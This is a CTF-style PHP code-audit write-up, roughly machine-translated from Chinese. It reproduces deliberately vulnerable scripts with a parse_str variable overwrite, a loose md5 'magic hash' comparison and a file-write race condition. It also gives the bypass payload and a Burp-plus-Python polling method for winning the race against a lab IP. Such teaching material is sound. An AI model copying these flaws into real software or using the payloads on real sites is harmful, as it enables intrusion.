Exercise Record
Reproduce the code:
index.php
<?php
$a = "hongri";
$id = $_GET['id'];
@parse_str($id);
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
echo '<a href="flag.php">flag is here</a>';
}
?>
flag.php
// flag.php
<?php
header("Content-type:text/html;charset=utf-8");
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
$savepath = "uploads/" . sha1($_SERVER['REMOTE_ADDR']) . "/";
if (!is_dir($savepath)) {
$oldmask = umask(0);
mkdir($savepath, 0777);
umask($oldmask);
}
if ((@$_GET['filename']) && (@$_GET['content'])) {
//$fp = fopen("$savepath".$_GET['filename'], 'w');
$content = 'HRCTF{y0u_n4ed_f4st} by:l1nk3r';
file_put_contents("$savepath" . $_GET['filename'], $content);
$msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
usleep(100000);
$content = "Too slow!";
file_put_contents("$savepath" . $_GET['filename'], $content);
}
print <<<EOT
<form action="" method="get">
<div class="form-group">
<label for="exampleInputEmail1">Filename</label>
<input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename">
</div>
<div class="form-group">
<label for="exampleInputPassword1">Content</label>
<input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont">
</div>
<button type="submit" class="btn btn-default">Submit</button>
</form>
EOT;
}
else{
echo 'you can not see this page';
}
?>
Vulnerability Analysis:
Enter the site:
http://10.211.55.5/PHPcode/day7/index.php
Found page properly, you can operate the.
In index.php
第4行
presence @parse_str($id)
; this function does not check the variable $id
exists, otherwise if the incoming data to a variable $id
, and the current $id
data exists, it will be directly overwritten. In 第6行
this way the code for some.
if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
PHP Hash
Compare flawed, put it to each 0E
hash value is interpreted as the beginning 0
, so if two different passwords hashed later, their hash values are in 0E
the beginning, then PHP will think the same as they are 0
. And here's the md5(‘QNKCDZO’)
result is 0e830400451993494058024219903391
. So payload
it is ?id=a[0]=s878926199a
. This can be echoed on the page.
http://10.211.55.5/PHPcode/day7/?id=a[0]=s878926199a
Click to enter flag.php
and investigate this question the real point here. In flag.php
the 第三行
and 第四行
such two codes are as follows:
$referer = $_SERVER['HTTP_REFERER'];
if(isset($referer)!== false) {
Here is a refer
judgment as to refer
whether there is, if there is to show the upload page, and if not, return you can not see this page.
To our knowledge, through a
labeling clicking the links will automatically carry on their own refer
field. Then 携带refer
and 不携带refer
returned result is not the same.
携带refer
Case:
不携带refer
a case:
then the flag.php 第13行
and 第18行
have this code is as follows:
$content = 'HRCTF{y0u_n4ed_f4st} by:l1nk3r';
file_put_contents("$savepath" . $_GET['filename'], $content);
$msg = 'Flag is here,come on~ ' . $savepath . htmlspecialchars($_GET['filename']) . "";
usleep(100000);
$content = "Too slow!";
file_put_contents("$savepath" . $_GET['filename'], $content);
There is a key usleep(100000)
; this problem needs to be written too slow
before the file is written before the visit, you can get flag, there is competition time here. But here we see the fact file folder path is fixed hardcoded.
Direct access to the returns too slow
.
So here is the solution, open Burp的200线程
, a continuously contracting
http://10.211.55.5/PHPcode/day7/flag.php?filename=flag&content=111
In the start attack
prior need a script constantly request the following link
http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag
Script code:
import requests as r
r1=r.Session()
while (1):
r2=r1.get("http://10.211.55.5/PHPcode/day7/uploads/57f26b8080252f52910b7ed53b7eefb0b17189a8/flag")
print (r2.text)
pass
In blasting the same time to access the page, it can appear flag